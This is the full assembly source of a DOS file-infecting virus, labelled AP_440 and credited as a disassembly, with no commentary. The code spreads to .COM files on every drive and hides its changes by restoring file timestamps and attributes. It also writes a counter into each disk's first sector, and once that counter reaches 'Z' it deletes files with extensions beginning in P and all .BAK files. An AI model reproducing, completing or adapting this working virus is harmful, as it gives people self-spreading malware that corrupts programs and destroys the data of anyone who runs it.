AP_440
;
--------------------------------------------------------------------------
; Disassembled by FairWind / NRG , [email protected]
;
--------------------------------------------------------------------------
code segment
assume cs:code, ds:code
org 100
v_const = 2042d
start:
jmp v_entry
db 0CA
db (2048d - 9) dup (90)
mov ax,4C00
int 21
v_start label byte
first4 db 0E9, 0F8, 7, 90
allcom db '*.COM', 0
mydta label byte
reserve db 15 dup (?)
attrib db ?
time dw ?
date dw ?
fsize dd ?
namez db 14d dup (?)
allp db 0, '????????P??'
allbak db 0, '????????BAK'
maxdrv db ?
sign db 'ICS 89'
v_entry:
push ax
push dx
mov ah,19
int 21
push ax
mov ah,0E
mov dl,al
int 21
call self
self:
pop si
sub si,offset self-v_const
mov byte ptr [si+offset maxdrv-v_const],al
mov ax,[si+offset first4-v_const]
mov word ptr ds:[offset start],ax
mov ax,[si+offset first4+2-v_const]
mov word ptr ds:[offset start+2],ax
mov ah,1A
lea dx,[si+offset mydta-v_const]
int 21
pop ax
push ax
call inf_drive
xor al,al
drv_lp:
call inf_drive
jbe drv_lp
pop ax
mov ah,0E
mov dl,al
int 21
mov dx,80
mov ah,1A
int 21
mov si,offset start
pop dx
pop ax
jmp si
inf_drive:
push ax
mov ah,0E
mov dl,al
int 21
pop ax
push ax
push bx
push cx
push si
mov cx,1
xor dx,dx
lea bx,[si+offset v_end-v_const]
push ax
push bx
push cx
push dx
int 25
pop dx
pop dx
pop cx
pop bx
jc bad_drv
inc byte ptr [bx]
cmp byte ptr [bx+1],6F
jne wr_drive
bad_drv:
pop ax
pop si
drv_xit:
pop cx
pop bx
pop ax
inc al
cmp al,[si+offset maxdrv-v_const]
ret
wr_drive:
pop ax
int 26
pop ax
pop si
jc drv_xit
mov ah,4E
xor cx,cx
lea dx,[si+offset allcom-v_const]
next:
int 21
jc no_more
lea dx,[si+offset namez-v_const]
call infect
mov ah,4F
jc next
jmp drv_xit
no_more:
lea di,[si+offset v_end-v_const]
cmp byte ptr [di],'Z'
jb drv_xit
mov ah,13
lea dx,[si+offset allp-v_const]
int 21
cmp al,-1
je drv_xit
mov ah,13
lea dx,[si+offset allbak-v_const]
int 21
jmp drv_xit
namaddr dw ?
infect:
mov [si+offset namaddr-v_const],dx
mov ax,4301
xor cx,cx
int 21
jnc inf_cont
inf_xit:
ret
inf_cont:
mov ax,3D02
int 21
jc inf_xit
mov bx,ax
mov cx,4
mov ah,3F
lea di,[si+offset first4-v_const]
mov dx,di
int 21
jc quit
cmp byte ptr [di+3],0CA
stc
jz quit
mov cx,[si+offset fsize-v_const]
cmp cx,2048d
jb quit
cmp cx,64000d
stc
ja quit
xor cx,cx
xor dx,dx
mov ax,4202
int 21
push ax
jc quit
mov cx,v_end-v_start
nop
lea dx,[si+offset v_start-v_const]
mov ah,40
int 21
jc quit
pop ax
add ax,v_entry-v_start-3
mov byte ptr [di],0E9
mov [di+1],ax
mov byte ptr [di+3],0CA
xor cx,cx
xor dx,dx
mov ax,4200
int 21
jc quit
mov cx,4
mov dx,di
mov ah,40
int 21
quit:
pushf
mov ax,5701
mov cx,[si+offset time-v_const]
mov dx,[si+offset date-v_const]
int 21
mov ah,3E
int 21
mov ax,4301
mov cl,[si+offset attrib-v_const]
xor ch,ch
mov dx,[si+offset namaddr-v_const]
int 21
popf
ret
v_end equ $
code ends
end start
